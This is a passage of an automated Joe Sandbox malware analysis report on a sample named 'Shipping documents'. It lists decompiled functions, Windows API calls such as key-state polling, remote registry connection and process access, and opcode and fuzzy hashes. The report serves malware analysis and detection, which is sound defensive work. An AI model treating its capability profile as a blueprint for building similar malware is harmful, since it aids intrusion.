                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                          • String ID: AU3_GetPluginDetails$#v
                                                                                                          • API String ID: 145871493-3662034293
                                                                                                          • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                                                          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                          • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                                                          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                          Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                          • IsMenu.USER32(?), ref: 0044854D
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                          • DrawMenuBar.USER32 ref: 004485AF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                          Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_memmove_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 1589278365-1403004172
                                                                                                          • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                                                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                          • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                                                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                          Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 2519475695-2873401336
                                                                                                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                          Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 2519475695-2873401336
                                                                                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                          Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                          • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                          • String ID: Line:
                                                                                                          • API String ID: 1874344091-1585850449
                                                                                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                          Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 0-1011021900
                                                                                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                          Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                          • GetFocus.USER32 ref: 0046157B
                                                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                          • __swprintf.LIBCMT ref: 00461608
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                          • String ID: %s%d
                                                                                                          • API String ID: 2645982514-1110647743
                                                                                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                          Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                          Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3488606520-0
                                                                                                          • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                          • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                          Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15295421-0
                                                                                                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                          Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                          • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3539004672-0
                                                                                                          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                          Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 327565842-0
                                                                                                          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                          Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                          • String ID:
